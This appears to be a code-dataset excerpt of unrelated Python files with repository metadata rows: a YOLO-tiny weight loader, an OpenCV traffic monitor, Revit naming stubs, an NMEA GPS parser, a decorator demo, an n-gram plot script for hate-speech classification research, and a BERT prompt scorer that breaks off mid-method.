c3 = darknetConv2D(None,64),
c4 = darknetConv2D(None,128),
c5 = darknetConv2D(None,256),
c6 = darknetConv2D(None,256),
c7 = darknetConv2D(None,512),
c8 = darknetConv2D(None,512),
c9 = darknetConv2D(None,35,bn=False)
)
def __call__(self,x):
return self.predict(x)
def predict(self,x):
h = CRP(self.c1, x)
h = CRP(self.c2, h)
h = CRP(self.c3, h)
h = CRP(self.c4, h)
h = CRP(self.c5, h)
h = CRP(self.c6, h, stride=1)
        h = F.get_item(h,(slice(None),slice(None),slice(1,14),slice(1,14))) # h[:,:,1:14,1:14]
h = CRP(self.c7, h, pooling=False)
h = CRP(self.c8, h, pooling=False)
h = self.c9.b( self.c9.c(h)) # no leaky relu, no BN
return h
def loadCoef(self,filename):
print "loading",filename
file = open(filename,"rb")
        dat = np.fromfile(file, dtype=np.float32)[4:]  # skip header (4 x int32)
layers=[ [3,16],[16,32], [32,64], [64,128],[128,256],[256,256],[256,512],[512,512]]
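        # Darknet stores each batch-normalized convolutional layer's weights
        # in this order: bias, BN gamma, BN running mean, BN running variance,
        # then the convolution kernel reshaped as (out_ch, in_ch, 3, 3);
        # the loop below consumes the flat float32 array accordingly.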
offset=0
for i,l in enumerate(layers):
in_ch=l[0]
out_ch=l[1]
# load bias
txt= "self.c%d.b.b.data = dat[%d:%d]" % (i+1, offset, offset+out_ch)
offset+=out_ch
exec(txt)
# load bn
txt= "self.c%d.n.gamma.data = dat[%d:%d]" % (i+1, offset,offset+out_ch)
offset+=out_ch
exec(txt)
txt= "self.c%d.n.avg_mean = dat[%d:%d]" % (i+1, offset,offset+out_ch)
offset+=out_ch
exec(txt)
txt= "self.c%d.n.avg_var = dat[%d:%d]" % (i+1, offset,offset+out_ch)
offset+=out_ch
exec(txt)
# load convolution weight
txt= "self.c%d.c.W.data = dat[%d:%d].reshape(%d,%d,3,3)" % (i+1, offset, offset+(out_ch*in_ch*9), out_ch,in_ch)
offset+= (out_ch*in_ch*9)
exec(txt)
print offset
# load last convolution weight
in_ch=512
out_ch=35
txt= "self.c9.b.b.data = dat[%d:%d]" % ( offset, offset+out_ch)
offset+=out_ch
exec(txt)
txt= "self.c9.c.W.data = dat[%d:%d].reshape(%d,%d,1,1)" % ( offset, offset+out_ch*in_ch*1, out_ch,in_ch)
offset+=out_ch*in_ch*1
exec(txt)
print offset
if __name__ == '__main__':
c=YOLOtiny()
im=np.zeros((1,3,416,416),dtype=np.float32)
c.predict(im)
c.loadCoef("tiny-yolo-ppap_final.weights")
serializers.save_npz('YOLOtiny_v2.model',c)
| 31.716667 | 123 | 0.558329 | 575 | 3,806 | 3.58087 | 0.25913 | 0.043711 | 0.074794 | 0.057795 | 0.283633 | 0.278776 | 0.249636 | 0.228266 | 0.228266 | 0.185527 | 0 | 0.059926 | 0.285339 | 3,806 | 119 | 124 | 31.983193 | 0.697059 | 0.049133 | 0 | 0.236559 | 0 | 0.021505 | 0.087258 | 0.02964 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.086022 | null | null | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3529efe0bf0d6df5975b82e93a399f8498bfad6 | 4,091 | py | Python | id/trafficmon/TrafficMain.py | umanium/trafficmon | 86c138bda3c8a3e38fff273e5d61610acee123b5 | [
"MIT"
] | null | null | null | id/trafficmon/TrafficMain.py | umanium/trafficmon | 86c138bda3c8a3e38fff273e5d61610acee123b5 | [
"MIT"
] | null | null | null | id/trafficmon/TrafficMain.py | umanium/trafficmon | 86c138bda3c8a3e38fff273e5d61610acee123b5 | [
"MIT"
] | null | null | null | import os
import cv2
import numpy as np
import time
from backgroundsubtraction.KMeans import KMeans
from objectblob.ObjectBlobDetection import ObjectBlobDetection
from pixelcleaning.MorphologicalCleaning import MorphologicalCleaning
__author__ = 'Luqman'
def morphological(image):
    # factory for the pixel-cleaning model; the image argument is unused but
    # keeps the signature uniform with how test() calls algorithm(used_frame)
    cleaning_model = MorphologicalCleaning()
    return cleaning_model
def test(algorithm, vid_src, file_name):
_, frame = vid_src.read()
used_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
model = KMeans(used_frame, 3)
cleaning_model = algorithm(used_frame)
blob_detection = ObjectBlobDetection(used_frame)
n_frame = 0
image_resolution = (0, 0)
min_fps = -1
max_fps = -1
mean_fps = -1
real_fps = vid_src.get(cv2.cv.CV_CAP_PROP_FPS)
# vid_src.get(cv2.CV_CAP_PROP_FPS)
if not os.path.exists("saved_images/"+file_name):
os.makedirs("saved_images/"+file_name)
os.makedirs("saved_images/"+file_name+"/normal")
os.makedirs("saved_images/"+file_name+"/fg")
os.makedirs("saved_images/"+file_name+"/grayscale")
os.makedirs("saved_images/"+file_name+"/clean")
os.makedirs("saved_images/"+file_name+"/contour")
# applying background detection
while frame is not None:
time_start = time.time()
n_frame += 1
        # for explanatory purposes
        # capture image
# if n_frame % 30 == 0:
# cv2.imwrite("saved_images/"+file_name+"/normal/"+repr(n_frame)+".jpg", frame)
used_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
y, x = used_frame.shape
image_resolution = x, y
fg = model.apply(used_frame)
        # for explanatory purposes
        # capture image
# if n_frame % 30 == 0:
# cv2.imwrite("saved_images/"+file_name+"/fg/"+repr(n_frame)+".jpg", fg)
# cv2.imwrite("saved_images/"+file_name+"/grayscale/"+repr(n_frame)+".jpg", used_frame)
fg_use = np.copy(fg)
fg_clean = cleaning_model.apply(fg)
fg_clean_use = np.copy(fg_clean)
        # for explanatory purposes
        # capture image
# if n_frame % 30 == 0:
# cv2.imwrite("saved_images/"+file_name+"/clean/"+repr(n_frame)+".jpg", fg_clean)
# contours
blob_detection.get_contours(fg_clean_use, used_frame)
# cv2.drawContours(frame, contours, -1, (0, 255, 0), 2)
frame_with_contours = blob_detection.draw_blobs(frame)
# print len(contours)
        # for explanatory purposes
        # capture image
# if n_frame % 30 == 0:
# cv2.imwrite("saved_images/"+file_name+"/contour/"+repr(n_frame)+".jpg", frame_with_contours)
time_end = time.time()
cv2.imshow('img', frame_with_contours)
cv2.imshow('fg', fg)
cv2.imshow('fg_clean', fg_clean)
# prev_frame = np.copy(frame)
_, frame = vid_src.read()
if cv2.waitKey(1) & 0xFF == ord('q'):
break
time_process = time_end - time_start
cur_fps = 0
if time_process > 0:
cur_fps = 1. / time_process
# set max / min / mean fps
if (cur_fps > max_fps) or (max_fps == -1):
max_fps = cur_fps
if (cur_fps < min_fps) or (min_fps == -1):
min_fps = cur_fps
if mean_fps == -1:
mean_fps = cur_fps
else:
            mean_fps = (0.98 * mean_fps) + (0.02 * cur_fps)  # exponential moving average
print "--- run statistics ---"
print "image resolution: ", image_resolution
print "total frame: ", n_frame
print "min FPS: ", min_fps
print "max FPS: ", max_fps
print "average FPS: ", mean_fps
print "Video FPS: ", real_fps
if __name__ == '__main__':
import sys
if len(sys.argv) >= 2:
video_src_file = sys.argv[1]
if len(sys.argv) >= 3:
exp_file_name = sys.argv[2]
else:
exp_file_name = "default"
else:
video_src_file = 0
exp_file_name = "default"
# run video
vid = cv2.VideoCapture(video_src_file)
test(morphological, vid, exp_file_name)
| 29.431655 | 106 | 0.611831 | 537 | 4,091 | 4.383613 | 0.221601 | 0.057774 | 0.076466 | 0.096856 | 0.322005 | 0.269329 | 0.193288 | 0.193288 | 0.158454 | 0.158454 | 0 | 0.022059 | 0.268638 | 4,091 | 138 | 107 | 29.644928 | 0.764706 | 0.215106 | 0 | 0.111111 | 0 | 0 | 0.082261 | 0 | 0 | 0 | 0.001256 | 0 | 0 | 0 | null | null | 0 | 0.098765 | null | null | 0.08642 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d35417a4cf00badf31eab6d25dadb13c434cb246 | 1,176 | py | Python | release/stubs.min/Autodesk/Revit/DB/__init___parts/NamingUtils.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/Autodesk/Revit/DB/__init___parts/NamingUtils.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/Autodesk/Revit/DB/__init___parts/NamingUtils.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | class NamingUtils(object):
""" A collection of utilities related to element naming. """
@staticmethod
def CompareNames(nameA, nameB):
"""
CompareNames(nameA: str,nameB: str) -> int
Compares two object name strings using Revit's comparison rules.
nameA: The first object name to compare.
nameB: The second object name to compare.
    Returns: An integer indicating the result of the lexical comparison between
    the two names: less than zero if nameA comes before nameB in the ordering,
    zero if nameA and nameB are equivalent, and greater than zero if nameA
    comes after nameB in the ordering.
"""
pass
@staticmethod
def IsValidName(string):
"""
IsValidName(string: str) -> bool
Identifies if the input string is valid for use as an object name in Revit.
string: The name to validate.
Returns: True if the name is valid for use as a name in Revit,false if it contains
prohibited characters and is invalid.
"""
pass
__all__ = [
"CompareNames",
"IsValidName",
]
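# Illustrative usage sketch (assumes a Revit Python scripting environment;
# the variable names below are hypothetical):
#
#     if NamingUtils.IsValidName(proposed_name):
#         order = NamingUtils.CompareNames(proposed_name, existing_name)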
| 21 | 88 | 0.62585 | 147 | 1,176 | 4.979592 | 0.489796 | 0.054645 | 0.045082 | 0.051913 | 0.040984 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.315476 | 1,176 | 55 | 89 | 21.381818 | 0.909317 | 0.687925 | 0 | 0.363636 | 0 | 0 | 0.092369 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0.181818 | 0 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d3604b03b5b7d1f10584723f9cdd33c78d84a311 | 494 | py | Python | 1138_05_19-nmea.py | nchaparr/Geospatial-Analysis-with-Python | 6e0d1ff429baa4205c63bf842ab950ed4176536f | [
"CC0-1.0"
] | null | null | null | 1138_05_19-nmea.py | nchaparr/Geospatial-Analysis-with-Python | 6e0d1ff429baa4205c63bf842ab950ed4176536f | [
"CC0-1.0"
] | null | null | null | 1138_05_19-nmea.py | nchaparr/Geospatial-Analysis-with-Python | 6e0d1ff429baa4205c63bf842ab950ed4176536f | [
"CC0-1.0"
] | null | null | null | """Parse NMEA GPS strings"""
from pynmea.streamer import NMEAStream
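# nmea.txt is expected to contain raw NMEA 0183 sentences, one per line, e.g.
# (an illustrative GGA fix sentence):
#   $GPGGA,123519,4807.038,N,01131.000,E,1,08,0.9,545.4,M,46.9,M,,*47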
nmeaFile = open("nmea.txt")
nmea_stream = NMEAStream(stream_obj=nmeaFile)
next_data = nmea_stream.get_objects()
nmea_objects = []
while next_data:
nmea_objects += next_data
next_data = nmea_stream.get_objects()
# The NMEA stream is parsed!
# Let's loop through the
# Python object types:
for nmea_ob in nmea_objects:
if hasattr(nmea_ob, "lat"):
print "Lat/Lon: (%s, %s)" % (nmea_ob.lat, nmea_ob.lon)
| 30.875 | 59 | 0.712551 | 75 | 494 | 4.466667 | 0.493333 | 0.119403 | 0.107463 | 0.107463 | 0.167164 | 0.167164 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168016 | 494 | 15 | 60 | 32.933333 | 0.815085 | 0.143725 | 0 | 0.181818 | 0 | 0 | 0.074468 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.090909 | null | null | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3606a910d1904ced1fc96fd6f2ed700d8ae5f9d | 852 | py | Python | languages/python/src/concepts/P104_Decorators_ClassBasedDecorators.py | vikash-india/DeveloperNotes2Myself | fe277a3c52f73884863f2f72b237365b27a8c882 | [
"MIT"
] | 2 | 2019-05-25T10:09:00.000Z | 2022-03-11T09:06:23.000Z | languages/python/src/concepts/P104_Decorators_ClassBasedDecorators.py | vikash-india/DeveloperNotes2Myself | fe277a3c52f73884863f2f72b237365b27a8c882 | [
"MIT"
] | 2 | 2020-03-31T04:30:17.000Z | 2020-10-30T07:54:28.000Z | languages/python/src/concepts/P104_Decorators_ClassBasedDecorators.py | vikash-india/DeveloperNotes2Myself | fe277a3c52f73884863f2f72b237365b27a8c882 | [
"MIT"
] | 4 | 2019-07-12T13:18:56.000Z | 2021-11-17T08:04:55.000Z | # Description: Class Based Decorators
"""
### Note
* If you want to maintain some sort of state and/or just make your code more confusing, use class based decorators.
"""
class ClassBasedDecorator(object):
def __init__(self, function_to_decorate):
print("INIT ClassBasedDecorator")
self.function_to_decorate = function_to_decorate
def __call__(self, *args, **kwargs):
print("CALL ClassBasedDecorator")
return self.function_to_decorate(*args, **kwargs)
# Call Class Based Decorator
@ClassBasedDecorator
def function_1(*args):
for arg in args:
print(arg)
def function_2(*args):
for arg in args:
print(arg)
if __name__ == '__main__':
function_1(1, 2, 3)
# Call Class Based Decorator - Alternate way
function_2 = ClassBasedDecorator(function_2)
function_2(1, 2, 3)
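    # Illustrative sketch (not part of the original): a class-based decorator
    # can keep state across calls, e.g. counting invocations. The names below
    # are hypothetical examples.
    class CountCalls(object):
        def __init__(self, function_to_decorate):
            self.function_to_decorate = function_to_decorate
            self.count = 0
        def __call__(self, *args, **kwargs):
            self.count += 1
            return self.function_to_decorate(*args, **kwargs)
    @CountCalls
    def function_3(*args):
        for arg in args:
            print(arg)
    function_3(1, 2, 3)
    print(function_3.count)  # 1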
| 23.027027 | 115 | 0.692488 | 109 | 852 | 5.137615 | 0.422018 | 0.071429 | 0.128571 | 0.117857 | 0.085714 | 0.085714 | 0.085714 | 0 | 0 | 0 | 0 | 0.017884 | 0.212441 | 852 | 36 | 116 | 23.666667 | 0.816692 | 0.271127 | 0 | 0.222222 | 0 | 0 | 0.091653 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0 | 0 | 0.333333 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d363473272e75d741fdc620437d901b3dcaf7ba6 | 1,962 | py | Python | Code/classification_system/data_visualisation/frequent_ngrams.py | sxd942/fascist_text_classification | 29c429165bdd18ca031a30f98cf86a5090818c3c | [
"DOC"
] | null | null | null | Code/classification_system/data_visualisation/frequent_ngrams.py | sxd942/fascist_text_classification | 29c429165bdd18ca031a30f98cf86a5090818c3c | [
"DOC"
] | null | null | null | Code/classification_system/data_visualisation/frequent_ngrams.py | sxd942/fascist_text_classification | 29c429165bdd18ca031a30f98cf86a5090818c3c | [
"DOC"
] | null | null | null | import pandas as pd
import matplotlib.pyplot as plt
from nltk import ngrams
from preprocessing.preprocess import remove_stopwords
"""
frequent_ngrams.py was used to generate bar plots of most frequently used
bi and trigrams from the fascist and hate documents.
@Author: Siôn Davies
Date: July 2020
"""
# First the fascist documents...
df = pd.read_csv('../Datasets/dataset_utils/Gold_cleaned.csv')
df.Message_Post = df.Message_Post.apply(remove_stopwords)
def converter(Fascist_Speech):
if Fascist_Speech == 'Yes':
return 1
else:
return 0
df['Numeric_Label'] = df['Fascist_Speech'].apply(converter)
fascist = df[df.Numeric_Label == 1]
def list_format(data):
words = data.split()
return [word for word in words]
words = list_format(''.join(str(fascist.Message_Post.tolist())))
bigrams_series = (pd.Series(ngrams(words, 2)).value_counts())[:12]
trigrams_series = (pd.Series(ngrams(words, 3)).value_counts())[:12]
bigrams_series.sort_values().plot.barh(color='navy', width=0.7, figsize=(7, 3))
plt.ylabel('Bigram')
plt.xlabel('Frequency')
plt.show()
trigrams_series.sort_values().plot.barh(color='navy', width=0.7, figsize=(7, 4))
plt.ylabel('Trigram')
plt.xlabel('Frequency')
plt.show()
# Now to do the same for the hate documents...
df_hate = pd.read_csv('../Datasets/Multiclass/Hate_Fascist_Gold.csv')
df_hate.Message_Post = df_hate.Message_Post.apply(remove_stopwords)
hate = df_hate[df_hate.Label == 2]
hate_words = list_format(''.join(str(hate.Message_Post.tolist())))
hate_bigrams_series = (pd.Series(ngrams(hate_words, 2)).value_counts())[:12]
hate_trigrams_series = (pd.Series(ngrams(hate_words, 3)).value_counts())[:12]
hate_bigrams_series.sort_values().plot.barh(color='navy', width=0.7, figsize=(7, 3))
plt.ylabel('Bigram')
plt.xlabel('Frequency')
plt.show()
hate_trigrams_series.sort_values().plot.barh(color='navy', width=0.7, figsize=(7, 4))
plt.ylabel('Trigram')
plt.xlabel('Frequency')
plt.show()
| 29.727273 | 86 | 0.735984 | 301 | 1,962 | 4.624585 | 0.328904 | 0.047414 | 0.04023 | 0.057471 | 0.494253 | 0.320402 | 0.278736 | 0.278736 | 0.278736 | 0.278736 | 0 | 0.020513 | 0.105505 | 1,962 | 65 | 87 | 30.184615 | 0.77265 | 0.038226 | 0 | 0.292683 | 1 | 0 | 0.113384 | 0.050263 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04878 | false | 0 | 0.097561 | 0 | 0.219512 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3836f505332bb014cbedb07ee589147a9cb81f2 | 23,985 | py | Python | prompts/prompt_scorer.py | GpNico/bert_semantics | 9b8f9db7b136d1059e6f82c26fd10d164fe2e78d | [
"MIT"
] | null | null | null | prompts/prompt_scorer.py | GpNico/bert_semantics | 9b8f9db7b136d1059e6f82c26fd10d164fe2e78d | [
"MIT"
] | null | null | null | prompts/prompt_scorer.py | GpNico/bert_semantics | 9b8f9db7b136d1059e6f82c26fd10d164fe2e78d | [
"MIT"
] | null | null | null |
import numpy as np
import pickle
import tqdm
import os
import torch
from prompts.prompt_material import DETS_LIST, CONTENT_STRUCTS_PREFIX_LIST, CONTENT_STRUCTS_MIDDLE_LIST, CONTENT_STRUCTS_SUFFIX_LIST, TRANSFORMATIONS, LOGICAL_PREFIXES_LIST, LOGICAL_STRUCTS_LW_LIST
#######################################
# #
# CONTENT #
# #
#######################################
class ContentPromptScorer:
def __init__(self, model = None, tokenizer = None, device = None, dataset_name = ''):
# Model used to compute scores
self.model = model
self.tokenizer = tokenizer
self.device = device
# Load prompts materials
self.dets_list = DETS_LIST
self.structs_dict = {'prefix': CONTENT_STRUCTS_PREFIX_LIST,
'middle': CONTENT_STRUCTS_MIDDLE_LIST,
'suffix': CONTENT_STRUCTS_SUFFIX_LIST}
# Load transformations names
self.transformations_names = TRANSFORMATIONS
# Define template
self.vanilla_template = '<PREFIX> <DET1> <WORD1> <MIDDLE> <DET2> <WORD2> <SUFFIX>.'
self.key_template = '<det1>-<det2>-<prefix>-<middle>-<suffix>'
# Compute keys
self._compute_keys()
# Where to save data
self.filename = 'prompts\\scores\\content_prompts_scores_{}'.format(dataset_name)
# Compute Prompts
self.create_prompts()
def _compute_keys(self):
"""
Compute all the possible keys in the form idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
"""
N_dets = len(self.dets_list)
N_prefix = len(self.structs_dict['prefix'])
N_middle = len(self.structs_dict['middle'])
N_suffix = len(self.structs_dict['suffix'])
list_of_keys = []
for idx_det1 in range(N_dets):
for idx_det2 in range(N_dets):
for idx_prefix in range(N_prefix):
for idx_middle in range(N_middle):
for idx_suffix in range(N_suffix):
key = self.key_template.replace('<det1>', str(idx_det1)).replace('<det2>', str(idx_det2))
key = key.replace('<prefix>', str(idx_prefix)).replace('<middle>', str(idx_middle)).replace('<suffix>', str(idx_suffix))
list_of_keys.append(key)
self.list_of_keys = list_of_keys
def _from_key_to_words(self, key):
"""
Expect a key of the form idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
"""
list_of_idx = [int(idx) for idx in key.split('-')]
det1 = self.dets_list[list_of_idx[0]]
det2 = self.dets_list[list_of_idx[1]]
prefix = self.structs_dict['prefix'][list_of_idx[2]]
middle = self.structs_dict['middle'][list_of_idx[3]]
suffix = self.structs_dict['suffix'][list_of_idx[4]]
return [det1, det2, prefix, middle, suffix]
def _create_prompt(self, dets, structs):
det1, det2 = dets
prefix, middle, suffix = structs
sentence = self.vanilla_template.replace('<DET1>', det1).replace('<DET2>', det2)
sentence = sentence.replace('<PREFIX>', prefix).replace('<MIDDLE>', middle).replace('<SUFFIX>', suffix)
return sentence
def create_prompts(self):
"""
Returns : keys idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
value sentence
"""
dict_of_prompts = {}
for key in self.list_of_keys:
words_from_keys = self._from_key_to_words(key)
dets, structs = words_from_keys[0:2], words_from_keys[2:5]
sentence = self._create_prompt(dets, structs)
dict_of_prompts[key] = sentence
self.dict_of_prompts = dict_of_prompts
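    # Illustrative example (the contents of DETS_LIST and the structure lists
    # are defined in prompts.prompt_material): key '0-0-0-0-0' selects the
    # first determiner for both slots and the first prefix/middle/suffix
    # structure, yielding a sentence whose <WORD1>/<WORD2> placeholders are
    # later replaced with mask tokens in phi().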
def compute_all_pairs_scores(self, list_of_words):
"""
expect words = list of pairs [HYPONYM, NOUN]
returns : dict -> key "HYPONYM---NOUN"
value dict -> key transf
value dict -> keys idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
value [score_mask1, score_mask2]
"""
# Compute Prompts Scores
if os.path.exists(self.filename): # Previous save
savefile = open(self.filename, 'rb')
all_pairs_scores_dict = pickle.load(savefile)
savefile.close()
else:
all_pairs_scores_dict = {}
num_treated = 0
for words in tqdm.tqdm(list_of_words, total = len(list_of_words)):
word1, word2 = words
key = word1 + '---' + word2
if key in all_pairs_scores_dict.keys(): #If we have already computed this key go to the next
continue
scores_dict = self.batch_compute_one_pair_scores(words)
all_pairs_scores_dict[key] = scores_dict
num_treated += 1
if num_treated % 20000 == 0: #Save from time to time
savefile = open(self.filename, 'wb')
pickle.dump(all_pairs_scores_dict, savefile)
savefile.close()
self.all_pairs_scores_dict = all_pairs_scores_dict
# Save scores
savefile = open(self.filename, 'wb')
pickle.dump(all_pairs_scores_dict, savefile)
savefile.close()
def compute_one_pair_scores(self, words):
"""
expect words = [HYPONYM, NOUN]
returns : dict -> key transf
value dict -> keys idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
value [score_mask1, score_mask2]
"""
# Tokenize the words to know the number of masks to add
word1, word2 = words
masked_token_ids_1 = self.tokenizer(word1)['input_ids'][1:-1]
masked_token_ids_2 = self.tokenizer(word2)['input_ids'][1:-1]
N_masks_1 = len(masked_token_ids_1)
N_masks_2 = len(masked_token_ids_2)
# Construct sentences
scores_dict = {}
for transf in self.transformations_names:
transf_score_dict = {}
for key in self.list_of_keys:
vanilla_sentence = self.dict_of_prompts[key]
sentence, mask1_rank, mask2_rank = self.phi(vanilla_sentence, transf, N_masks_1, N_masks_2)
# Compute input_ids and attention_mask of the sentence
encoding = self.tokenizer(sentence,
return_tensors='pt'
)
input_ids = encoding['input_ids'].to(self.device)
attention_mask = encoding['attention_mask'].to(self.device)
# The model needs the masks_to_predict_pos
masks_to_predict_pos = self.find_masks_pos(input_ids)
score_mask1 = self._compute_model_score(input_ids, attention_mask, masked_token_ids_1, masks_to_predict_pos[mask1_rank - 1])
score_mask2 = self._compute_model_score(input_ids, attention_mask, masked_token_ids_2, masks_to_predict_pos[mask2_rank - 1])
transf_score_dict[key] = [score_mask1, score_mask2]
scores_dict[transf] = transf_score_dict
return scores_dict
def _compute_model_score(self, input_ids, attention_mask, masked_token_ids, masks_to_predict_pos):
# Compute the probabilities and ranks from the model
with torch.no_grad():
probs_n_ranks = self.model.compute_greedy(input_ids, attention_mask, masks_to_predict_pos, masked_token_ids)
# Compute scores
score = probs_n_ranks[:,0].prod()
return score
def batch_compute_one_pair_scores(self, words):
"""
expect words = [HYPONYM, NOUN]
returns : dict -> key transf
value dict -> keys idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
value [score_mask1, score_mask2]
"""
# Tokenize the words to know the number of masks to add
word1, word2 = words
masked_token_ids_1 = self.tokenizer(word1, return_tensors='pt')['input_ids'][:,1:-1].repeat(len(self.list_of_keys),1).to(self.device)
masked_token_ids_2 = self.tokenizer(word2, return_tensors='pt')['input_ids'][:,1:-1].repeat(len(self.list_of_keys),1).to(self.device)
N_masks_1 = masked_token_ids_1.shape[1]
N_masks_2 = masked_token_ids_2.shape[1]
# Construct sentences
scores_dict = {}
for transf in self.transformations_names:
transf_score_dict = {}
sentences = []
mask1_ranks, mask2_ranks = [], []
for key in self.list_of_keys:
vanilla_sentence = self.dict_of_prompts[key]
sentence, mask1_rank, mask2_rank = self.phi(vanilla_sentence, transf, N_masks_1, N_masks_2)
sentences.append(sentence)
mask1_ranks.append(mask1_rank)
mask2_ranks.append(mask2_rank)
# Compute input_ids and attention_mask of the sentence
encoding = self.tokenizer(sentences,
padding = True,
return_tensors='pt'
)
input_ids = encoding['input_ids'].to(self.device)
attention_mask = encoding['attention_mask'].to(self.device)
# The model needs the masks_to_predict_pos
masks_to_predict_pos = self.batch_find_masks_pos(input_ids) # We suppose this is ok
scores_mask1 = self._batch_compute_model_score(input_ids, attention_mask, masked_token_ids_1, self.helper(masks_to_predict_pos, mask1_ranks).to(self.device))
scores_mask2 = self._batch_compute_model_score(input_ids, attention_mask, masked_token_ids_2, self.helper(masks_to_predict_pos, mask2_ranks).to(self.device))
for idx in range(len(self.list_of_keys)):
key = self.list_of_keys[idx]
transf_score_dict[key] = [scores_mask1[idx].item(), scores_mask2[idx].item()]
scores_dict[transf] = transf_score_dict
return scores_dict
def _batch_compute_model_score(self, input_ids, attention_mask, masked_token_ids, masks_to_predict_pos):
# Compute the probabilities and ranks from the model
with torch.no_grad():
probs = self.model.batch_compute_greedy(input_ids, attention_mask, masks_to_predict_pos, masked_token_ids)
# Compute scores
scores = probs.prod(dim=1) # shape [batch_size = len(self.list_of_keys)]
return scores
def batch_find_masks_pos(self, ids_seq):
        masks_pos = torch.where(ids_seq == 103)[1]  # 103 is BERT's [MASK] token id
pos_clusters = []
cluster = []
for k in range(masks_pos.shape[0]):
cluster.append(masks_pos[k])
if (k < len(masks_pos) -1) and (masks_pos[k] + 1 != masks_pos[k + 1]): #The next mask pos does not follow the previous one
pos_clusters.append(torch.LongTensor(cluster))
cluster = []
pos_clusters.append(torch.LongTensor(cluster))
return pos_clusters
    def helper(self, list_of_tensors, mask_rank):
        # assumes exactly two mask clusters per sentence, hence the 2*k slicing
        batch_size = len(self.list_of_keys)
mask_pos = []
for k in range(batch_size):
mask_pos.append(list_of_tensors[2*k:2*k+2][mask_rank[k] - 1])
return torch.cat(mask_pos)
def find_masks_pos(self, ids_seq):
"""
        Compute all mask-token positions in the sequence, group them into
        clusters of consecutive positions, and return the list of clusters.
"""
def find_all_masks_pos(ids_seq):
pos = []
for k in range(ids_seq.shape[1]):
if ids_seq[0][k] == 103:
pos.append(k)
return pos
all_masks_pos = find_all_masks_pos(ids_seq)
pos_clusters = []
cluster = []
for k in range(len(all_masks_pos)):
cluster.append(all_masks_pos[k])
if (k < len(all_masks_pos) -1) and (all_masks_pos[k] + 1 != all_masks_pos[k + 1]): #The next mask pos does not follow the previous one
pos_clusters.append(cluster)
cluster = []
pos_clusters.append(cluster)
return pos_clusters
def phi(self, vanilla_sentence, transf, N_masks_1, N_masks_2):
"""
Take a sentence s and returns phi(s) and the rank of mask1 (cf. google doc.)
The template vanilla is something like : "MASK1 is MASK2" thus MASK1 is rank 1 and MASK2 is rank 2
Whereas for the transformation opposite : "MASK2 is MASK1" thus MASK1 is rank 2 and MASK2 is rank 1
"""
if transf == 'vanilla':
sentence = vanilla_sentence.replace('<WORD1>', N_masks_1*self.tokenizer.mask_token).replace('<WORD2>', N_masks_2*self.tokenizer.mask_token)
mask1_rank, mask2_rank = 1, 2
elif transf == 'opposite':
sentence = vanilla_sentence.replace('<WORD1>', N_masks_2*self.tokenizer.mask_token).replace('<WORD2>', N_masks_1*self.tokenizer.mask_token)
mask1_rank, mask2_rank = 2, 1
elif transf == 'reverse':
sentence = vanilla_sentence.replace('<WORD1>', N_masks_2*self.tokenizer.mask_token).replace('<WORD2>', N_masks_1*self.tokenizer.mask_token)
